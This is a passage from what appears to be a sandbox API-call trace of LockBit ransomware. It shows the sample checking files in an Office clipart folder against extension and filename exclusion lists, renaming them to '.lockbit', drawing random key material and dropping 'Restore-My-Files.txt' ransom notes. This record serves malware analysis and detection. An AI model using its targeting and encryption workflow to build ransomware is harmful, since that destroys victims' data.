lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.308] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.308] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01586_.WMF") returned 1 [0113.308] lstrcmpiW (lpString1="ntldr", lpString2="DD01586_.WMF") returned 1 [0113.309] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01586_.WMF") returned 1 [0113.309] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01586_.WMF") returned -1 [0113.309] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01586_.WMF") returned -1 [0113.309] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01586_.WMF") returned 1 [0113.309] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01586_.WMF") returned 1 [0113.309] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.309] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned=".WMF" [0113.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.309] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.309] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.310] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.310] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.lockbit") returned 72 [0113.310] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0113.311] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.311] malloc (_Size=0x40068) returned 0x3d70450 [0113.311] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2324) returned 1 [0113.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0113.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0113.312] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.317] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.317] malloc (_Size=0xa6) returned 0x77d7a8 [0113.317] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.318] free (_Block=0x77d7a8) [0113.318] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.318] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.318] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.318] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf28f0200, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf28f0200, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0x4a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01628_.WMF", cAlternateFileName="")) returned 1 [0113.318] lstrcmpiW (lpString1=".", lpString2="DD01628_.WMF") returned -1 [0113.318] lstrcmpiW (lpString1="..", lpString2="DD01628_.WMF") returned -1 [0113.318] PathFindExtensionW (pszPath="DD01628_.WMF") returned=".WMF" [0113.318] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.318] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.318] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.318] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.319] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.320] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.320] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01628_.WMF") returned 1 [0113.321] lstrcmpiW (lpString1="ntldr", lpString2="DD01628_.WMF") returned 1 [0113.321] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01628_.WMF") returned 1 [0113.321] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01628_.WMF") returned -1 [0113.321] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01628_.WMF") returned -1 [0113.321] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01628_.WMF") returned 1 [0113.321] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01628_.WMF") returned 1 [0113.321] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.321] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned=".WMF" [0113.321] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.321] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.321] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.322] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.322] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.lockbit") returned 72 [0113.322] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0113.323] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.323] malloc (_Size=0x40068) returned 0x3ef0008 [0113.323] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=19068) returned 1 [0113.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.324] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0113.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.324] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0113.325] ReadFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0113.348] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.348] malloc (_Size=0xa6) returned 0x77d7a8 [0113.348] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.349] free (_Block=0x77d7a8) [0113.349] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.349] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.349] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.349] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa241400, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaa241400, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01629_.WMF", cAlternateFileName="")) returned 1 [0113.349] lstrcmpiW (lpString1=".", lpString2="DD01629_.WMF") returned -1 [0113.349] lstrcmpiW (lpString1="..", lpString2="DD01629_.WMF") returned -1 [0113.349] PathFindExtensionW (pszPath="DD01629_.WMF") returned=".WMF" [0113.349] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.349] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.350] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.350] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.351] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01629_.WMF") returned 1 [0113.351] lstrcmpiW (lpString1="ntldr", lpString2="DD01629_.WMF") returned 1 [0113.351] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01629_.WMF") returned 1 [0113.351] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01629_.WMF") returned -1 [0113.351] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01629_.WMF") returned -1 [0113.351] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01629_.WMF") returned 1 [0113.351] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01629_.WMF") returned 1 [0113.352] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.352] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned=".WMF" [0113.352] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.352] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.352] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.353] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.353] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.lockbit") returned 72 [0113.353] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0113.353] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.353] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.353] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=580) returned 1 [0113.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 